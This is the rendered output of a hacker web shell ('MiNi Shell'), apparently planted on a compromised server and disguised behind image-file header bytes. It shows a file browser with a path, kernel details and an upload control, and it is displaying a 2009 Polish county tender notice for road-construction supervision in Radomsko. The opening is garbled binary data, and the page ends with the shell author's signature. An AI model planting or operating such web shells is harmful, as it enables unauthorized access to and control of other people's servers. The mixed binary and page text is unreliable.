JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090903/146651-N-2009.html

<p class="kh_header"><b>Radomsko: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego przy realizacji zadania pn. Przebudową ciągu dróg powiatowych nr 3922E i 3923E Kletnia - Żytno, powiat radomszczański.</b><br>
<b>Numer ogłoszenia: 146651 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Radomszczański , ul. Leszka Czarnego 22/316, 97-500 Radomsko, woj. łódzkie, tel. 044 6834509, faks 044 6834192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.radomszczanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego przy realizacji zadania pn. Przebudową ciągu dróg powiatowych nr 3922E i 3923E Kletnia - Żytno, powiat radomszczański..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru Inwestorskiego przy realizacji zadania pn. Przebudowa ciągu dróg powiatowych nr 3922E i 3923E Kletnia - Żytno, odcinek o długości  32,981 km.

        Przedmiot zamówienia realizowany będzie w oparciu o podpisaną dnia 26 czerwca  2009 r. umową o dofinansowanie projektu nr UDA-RPLD.01.01.00-00-12/09-00 w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata  2007-2013, Oś priorytetowa I. Infrastruktura Transportowa, Działanie I.1 Drogi.

        W ramach pełnienia funkcji Inspektora Nadzoru Inwestorskiego do podstawowych
       obowiązków Wykonawcy  należy w szczególności:        
       -      reprezentowanie Inwestora na budowie poprzez sprawowanie kontroli zgodności jej    
               realizacji z projektami, pozwoleniem na budowę oraz  przepisami i zasadami wiedzy 
               technicznej,
      -  sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, 
               a w szczególności zapobieganie zastosowaniu wyrobów wadliwych i nie                
               dopuszczonych do stosowania w budownictwie,
      -       sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających oraz    
               przygotowanie i udział w czynnościach odbioru wykonanych robót, jak również 
w przekazaniu ich do użytkowania, jeśli przekazanie takie będzie wymagane przepisami prawa budowlanego,
      -       uczestniczenie w próbach i odbiorach technicznych,
      -        potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także na żądanie    
               inwestora kontrolowanie rozliczeń budowy.

         Celem zamówienia o którym mowa w sekcji II jest zapewnienie płynnego wdrożenia umowy na roboty, nie przekroczenie budżetu, terminowy odbiór robót. Usługami jakie mają być świadczone w ramach niniejszego zamówienia są nadzór wraz z weryfikacją dokumentacji projektowej oraz kontrola postępu robót budowlanych zgodnie z umową.
        Charakterystyka zadania budowlanego nad którym sprawowany będzie nadzór.
        W/w inwestycja swoim zakresem obejmuje:
- roboty pomiarowe,
- wykonanie poszerzenia jezdni,
- roboty rozbiórkowe ,
- wykonanie chodnika,
- wykonanie nawierzchni jezdni,
- wykonanie przepustów pod drogą,
- przebudowę chodników,
- wykonanie poboczy tłuczniowych, 
- wykonanie rowów, przepustów,
- regulację studni i kratek ściekowych.

        Dokumenty posiadane przez Zamawiającego - dokumentacja techniczna -dod.  
        nr 9 do SIWZ
       - Projekt budowlany: część opisowa,
       - Projekt budowlany: część rysunkowa,
       - Projekt budowlany : materiały przetargowe,
       - Informacje do przedmiaru robót,
       - Mapa do celów projektowych,- do wglądu w siedzibie Zamawiającego-     
         Wydział Zarządzania Drogami (pok. 319)
       - Pozwolenie na budowę,

Zakres działań
Obowiązki ogólne.
Inspektor Nadzoru Inwestorskiego przy realizacji zadania pn. Przebudową ciągu dróg powiatowych nr 3922E i 3923E Kletnia - Żytno. Odcinek o długości 32,981 km. jest zobowiązany do wykonywania obowiązków, a w szczególności:

1. Przygotowanie dokumentów i informacji dla Zamawiającego niezbędnych do   wywiązywania się z obowiązków wynikających z umowy nr UDA-RPLD.01.01.00-00 012/09-00 z dnia 26 czerwca 2009 r. o dofinansowanie projektu w Ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata  2007 -  2013,Oś priorytetowa I. Infrastruktura Transportowa, Działanie I.1 Drogi (stanowiącej Dodatek nr 8 do SIWZ);

W celu spełnienia powyższych obowiązków Inspektor Nadzoru Inwestorskiego sporządzi 
i przekaże zamawiającemu dokumenty rozliczeniowe oraz wszelkie inne, których sporządzenie lub sprawdzenie przez Inspektora Nadzoru Inwestorskiego będzie wynikało z umowy 
z Wykonawcą robót bądź z wymagań finansowania przez Unię Europejską. Wskazane powyżej dokumenty sprawozdawcze i rozliczeniowe Inspektor Nadzoru Inwestorskiego będzie przekazywał Zamawiającemu niezwłocznie po otrzymaniu informacji od Zamawiającego.

2.       Nadzorowania inwestycji w ścisłej współpracy z Zamawiającym, mając zawsze na względzie pomyślne ukończenie robót w sposób poprawny jakościowo, zgodnie z harmonogramem rzeczowo - finansowym.

3.	Uczestnictwa w przekazaniu przez Zamawiającego Wykonawcy robót terenu budowy.

4.	Sprawnego nadzorowania inwestycji w sposób umożliwiający:
              - kontrolę i rejestracje postępu robót, 
              - rejestrację zmian.

5.	Oceny użytych przez Wykonawcę materiałów budowlanych:
      - nadzorowanie badań materiałów budowlanych,
      - kontrola sposobu składowania i przechowywania materiałów,
      - zatwierdzanie receptur i technologii proponowanych przez Wykonawcę robót,
      - zatwierdzanie przed wbudowaniem materiałów i półwyrobów oraz dokonywanie ich oceny jakościowej i zgodności z wymaganiami obowiązujących norm,
      - zlecanie Wykonawcy wykonania dodatkowych badań materiałów budzących    
      wątpliwość co do ich jakości,
Dopuszczenie do pracy wytwórni mas bitumicznych oraz sprzętu i środków transportu Wykonawcy robót, w  przypadku użycia przez Wykonawcę materiałów zamiennych, jednakże spełniających parametry techniczne wymagane w dokumentacji projektowej. Wykonawca winien uzyskać pisemne: aprobatę Projektanta i zgodę Inspektora Nadzoru Inwestorskiego.

6.	Kontroli robót:
      - prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonanych robót, monitorowania realizacji zawartej umowy,
      - żądania od kierownika budowy lub robót, dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót,
      - podejmowania decyzji o wstrzymaniu części lub całości robót, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę, wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez Wykonawcę robót, która zachowuje się niewłaściwie, jest niekompetentna lub niedbała w swojej pracy,
      - kontroli zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu dokonywania obmiaru wykonanych robót, odbioru robót zanikających i ulegających zakryciu.

7.	Kontroli prawidłowości prowadzenia dziennika budowy, książek obmiarów i dokonywanie wpisów.

8.	Sporządzania i przechowywania dokumentacji dotyczącej prowadzonego nadzoru.

9.	Badań, pomiarów, zlecenia i wykonania ekspertyz, kontrolnych badań laboratoryjnych i pomiarów geodezyjnych wykonanych robót w razie zaistnienia uzasadnionej potrzeby.

10.  Udzielania Wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących danego zadania.

11. Współdziałania z autorem dokumentacji projektowej w zakresie sprawowanego przez niego nadzoru autorskiego i uzyskiwania od Projektanta zgody na zmiany w zakresie projektu budowlanego.

12.  Organizowania, przeprowadzania i dokonywania po uprzednim zawiadomieniu  
      Zamawiającego, czynności odbiorów dla poszczególnych części zdania od Wykonawcy robót, a w szczególności: 
	- sprawdzenia gotowości do odbioru, 
	- przeprowadzenia komisyjnych odbiorów, 
	- wystawienia świadectwa odbioru końcowego, 
	- przekazania przedmiotu odbioru Zamawiającemu wraz z dokumentacją powykonawczą,
	- dokonania odbioru końcowego po upływie terminu gwarancji.	

13.  Sporządzania i przekazywania Zamawiającemu:
1.	podpisanych protokołów odbiorów poszczególnych części zadania wraz ze sprawdzonym rozliczeniem finansowym tych prac, 
2.	dokumentacji rzeczowo - finansowej - powykonawczej w sposób zapewniający sprawne i terminowe płatności Wykonawcy robót.

14. Egzekwowania od Wykonawcy robót obsługi geodezyjnej i inwentaryzacji powykonawczej robót.

15. Opracowania informacji niezbędnych Zamawiającemu do uzyskania dodatkowych środków finansowych, a w razie potrzeby fachowa pomoc Zamawiającemu przy ich sporządzaniu.

16.  Rozliczenia umowy o roboty budowlane w przypadku jej wypowiedzenia.

17.  Kontrolowania przestrzegania przez Wykonawcę robót zasad BHP, w tym zgodności z zasadami Bezpiecznego Ruchu Drogowego (BRD) sposobu prowadzenia robót ,pod ruchem, oraz utrzymania porządku na terenie budowy.

18.   Zachowania wymagań ochrony środowiska.

19.  Informowania  z  wyprzedzeniem  i  uzgadnianie  z  Zamawiającym  odstępstw  od  zakresu podstawowego inwestycji/zmian technicznych, robotach dodatkowych/ powodujących wzrost kosztów inwestycji.

20. Zachowania zgodności przedmiotu umowy ze Specyfikacją Istotnych Warunków Zamówienia bądź pomoc Zamawiającemu w rozwiązaniu problemów z legalizacją ewentualnych zmian.

21.   Przedstawienia Zamawiającemu pisemnych zaleceń na temat wyceny stawek wszelkich nieprzewidzianych robót.

22.   Zapobiegania roszczeniom Wykonawcy robót.

23.  Identyfikowania wszędzie gdzie jest to możliwe ryzyk powstania potencjalnych roszczeń ze strony Wykonawcy robót i stron trzecich oraz informowania o tym Zamawiającego z propozycjami sposobów zapobiegania tym roszczeniom.

24.  Powiadomienia Zamawiającego o wszelkich roszczeniach Wykonawcy robót oraz rozbieżnościach między dokumentacją Zamawiającego a stanem faktycznym na terenie budowy.

25.  Rozpatrywania roszczeń Wykonawcy robót i przedstawienia stanowiska w odniesieniu do nich.

26.  W przypadku, gdy wszczęty zostanie spór sądowy między Zamawiającym a Wykonawcą robót dotyczący realizacji inwestycji, wsparcie Zamawiającego, poprzez przedstawienie wyczerpujących informacji i wyjaśnień dotyczących sporu.

27.  Udziału w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją inwestycji.

28. Sporządzania raportów, sprawozdań i informacji na etapie realizacji inwestycji wymaganej przez inne jednostki, np. GUS itp.

29.  Znajomości wszystkich przepisów wydanych przez władze centralne i miejscowe oraz innych przepisów i wytycznych, które w jakikolwiek sposób są związane z robotami. Inspektor Nadzoru Inwestorskiego będzie w pełni odpowiedzialny za przestrzeganie tych praw, przepisów i wytycznych podczas realizacji inwestycji.

30.  Sporządzania oceny technicznej zrealizowanej inwestycji, która winna zawierać opis - zawarte umowy, dane techniczne obiektu, zakres rzeczowy, tok realizacji, warunki realizacji, pomiary, badania kontrolne, wnioski końcowe.

31.  Inspektor Nadzoru Inwestorskiego wraz z Wykonawcą przygotują na dzień odbioru końcowego niezbędną dokumentację i wniosek celem zgłoszenia zakończenia robót i uzyskania decyzji o pozwoleniu na użytkowanie.

Etap po zakończeniu robót

Obsługa okresu gwarancyjnego
1.	Nadzór nad usunięciem usterek stwierdzonych w trakcie końcowego odbioru i w trakcie okresu gwarancyjnego oraz protokolarne potwierdzenie ich usunięcia.

2.	Przeprowadzenie przeglądów gwarancyjnych z udziałem Zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 8000,00 PLN - słownie: osiem tysiące złoty 00/100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia może ubiegać się Wykonawca, który:

1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień

2)	 posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia, w tym wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie  odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. nadzorował roboty drogowe o wartości brutto min. 10 000 000,00 zł.;

3) dysponuje osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie- do kierowania i nadzorowania robót drogowych bez ograniczeń, legitymującą się co najmniej pięcioletnim doświadczeniem zawodowym oraz  należącą do właściwej izby samorządu zawodowego.

4)	    znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie      	zamówienia. tj. Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w 	zakresie prowadzonej działalności, na termin składania ofert na kwotę min. 1 000 000,00 zł.

5)	   nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 	ustawy Prawo zamówień publicznych.
II. Opis sposobu dokonywania oceny spełniania tych warunków:
Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w Sekcji III.2) pkt III.1. będzie stanowiło podstawę do oceny spełnienia warunków udziału  w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie w/w warunki.
Uwaga: 
Zmawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że złożone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.1. Oświadczenia oraz dokumenty, potwierdzające spełnianie warunków, o których mowa w Sekcji III.2 pkt. I:
1)	oświadczenie o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy - z wykorzystaniem wzoru określonego w dodatku nr 2A, 2B, 2C, 2D, 2E, 2F do SIWZ,

Uwaga: Jeżeli wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia a wskazał w ofercie, że będzie dysponował takim potencjałem technicznym i osobami, wówczas winien złożyć oświadczenie - z wykorzystaniem wzoru określonego w dodatku nr 2D do SIWZ; 

2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie        do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 

4)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

5)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia określonej w SIWZ z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Należy również załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje Zamawiającego). W wykazie należy wskazać, co najmniej jedną usługę spełniającą wymóg określony w sekcji III.2 pkt I, ppkt 2

6)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia oraz dokumentów stwierdzających, że osoba (y), które będą uczestniczyć w wykonywaniu zamówienia posiadają:
            - uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń oraz aktualną przynależność do właściwej Izby Inżynierów Budownictwa  - dodatek nr 5;

7)	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 1 000.000,00 zł

III.2 Oferta wspólna

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej                                          w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:

1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika               do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

2)	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)	ustanowionego Pełnomocnika oraz zakres jego umocowania.

3)	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.

4)	Dokumenty, o których mowa w Sekcji III. ppkt 1,2,3,4 musi złożyć osobno każdy                      z Wykonawców składających ofertę wspólną.

5)	Wykonawcy występujący wspólnie muszą spełniać łącznie wymagania określone w  sekcji III.2 pkt 1 ppkt 2,3.

6)	Wymagania określone w sekcji III.2 pkt 1 ppkt 4 winny być spełnione przez co najmniej jednego Wykonawcę występującego wspólnie z innymi (wymaganie nie podlega sumowaniu).

7)	Formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.

8)	Wszystkie kopie dokumentów załączone do oferty muszą być opisane za zgodność z oryginałem i podpisane przez Pełnomocnika.

9)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie    z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.

III.3 Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
III.3.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Sekcji III.2) pkt III.1
1)	ppkt 2,3,4 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

III.3.2 Dokumenty, o których  mowa w sekcji III.2) pkt III.3.1 ppkt 1 lit. a), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument,   o którym mowa w sekcji  III.2) pkt III.3.1 ppkt 1 lit. b) powinien być wystawiony nie wcześniej   niż 3 miesiące przed upływem terminu składania ofert.

III.3.3 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.2) pkt III.3.1,  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia Sekcji III.3.2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.radomszczanski.pl./bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Radomsku 
Referat ds. Pozyskiwania Funduszy Zewnętrznych i Zamówień Publicznych, 
97-500 Radomsko, ul. Leszka Czarnego 22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Radomsku - Kancelaria Ogólna (p. 114), 97-500 Radomsko ul. Leszka Czarnego 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 10.10.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com